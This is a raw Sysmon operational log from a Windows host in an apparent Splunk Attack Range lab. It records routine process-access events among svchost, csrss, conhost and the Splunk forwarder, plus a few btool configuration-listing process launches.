13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8EDF-6005-A000-00000000A301}43604708C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.850{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:33.076{59A5CD1D-8EE0-6005-A700-00000000A301}22325040C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EE2-6005-AF00-00000000A301}42204116C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.823{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
